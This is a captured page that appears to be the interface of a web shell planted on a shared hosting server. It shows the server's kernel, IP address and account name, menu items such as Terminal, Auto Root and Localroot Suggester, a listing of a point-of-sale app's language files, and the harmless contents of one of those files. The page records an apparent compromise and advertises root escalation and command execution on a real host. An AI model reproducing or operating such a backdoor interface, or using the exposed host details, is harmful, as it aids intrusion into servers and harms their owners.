Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
ap.tsgbd.com /
aa /
lang /
en /
Delete
Unzip
Name
Size
Permission
Date
Action
account.php
2.11
KB
-rw-r--r--
2025-02-06 04:37
auth.php
674
B
-rw-r--r--
2025-02-06 04:37
barcode.php
2.17
KB
-rw-r--r--
2025-02-06 04:37
brand.php
757
B
-rw-r--r--
2025-02-06 04:37
business.php
3.95
KB
-rw-r--r--
2025-02-06 04:37
cash_register.php
1.31
KB
-rw-r--r--
2025-02-06 04:37
category.php
909
B
-rw-r--r--
2025-02-06 04:37
contact.php
1.55
KB
-rw-r--r--
2025-02-06 04:37
expense.php
1.59
KB
-rw-r--r--
2025-02-06 04:37
home.php
1.02
KB
-rw-r--r--
2025-02-06 04:37
invoice.php
3.17
KB
-rw-r--r--
2025-02-06 04:37
lang_v1.php
86.86
KB
-rw-r--r--
2025-02-06 04:37
messages.php
1.76
KB
-rw-r--r--
2025-02-06 04:37
myfatoorah.php
1.27
KB
-rw-r--r--
2025-02-06 04:37
pagination.php
534
B
-rw-r--r--
2025-02-06 04:37
passwords.php
746
B
-rw-r--r--
2025-02-06 04:37
printer.php
1.06
KB
-rw-r--r--
2025-02-06 04:37
product.php
2.48
KB
-rw-r--r--
2025-02-06 04:37
purchase.php
2.84
KB
-rw-r--r--
2025-02-06 04:37
receipt.php
869
B
-rw-r--r--
2025-02-06 04:37
report.php
3.07
KB
-rw-r--r--
2025-02-06 04:37
restaurant.php
4.34
KB
-rw-r--r--
2025-02-06 04:37
role.php
3.19
KB
-rw-r--r--
2025-02-06 04:37
sale.php
2.32
KB
-rw-r--r--
2025-02-06 04:37
stock_adjustment.php
1.08
KB
-rw-r--r--
2025-02-06 04:37
tax_rate.php
1.08
KB
-rw-r--r--
2025-02-06 04:37
tooltip.php
7.5
KB
-rw-r--r--
2025-02-06 04:37
unit.php
735
B
-rw-r--r--
2025-02-06 04:37
user.php
1.5
KB
-rw-r--r--
2025-02-06 04:37
validation.php
9.64
KB
-rw-r--r--
2025-02-06 04:37
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Stock Adjustment Language Lines |-------------------------------------------------------------------------- | | The following language lines are used for Stock Adjustment CRUD operations. | */ 'stock_adjustment' => 'Stock Adjustment', 'stock_adjustments' => 'Stock Adjustments', 'list' => 'List Stock Adjustments', 'add' => 'Add Stock Adjustment', 'all_stock_adjustments' => 'All stock adjustments', 'search_product' => 'Search products for stock adjustment', 'adjustment_type' => 'Adjustment type', 'normal' => 'Normal', 'abnormal' => 'Abnormal', 'total_amount' => 'Total Amount', 'total_amount_recovered' => 'Total amount recovered', 'reason_for_stock_adjustment' => 'Reason', 'stock_adjustment_added_successfully' => 'Stock adjustment added successfully', 'search_products' => 'Search Products', 'delete_success' => 'Stock adjustment deleted successfully', 'view_details' => 'View stock adjustment details', ];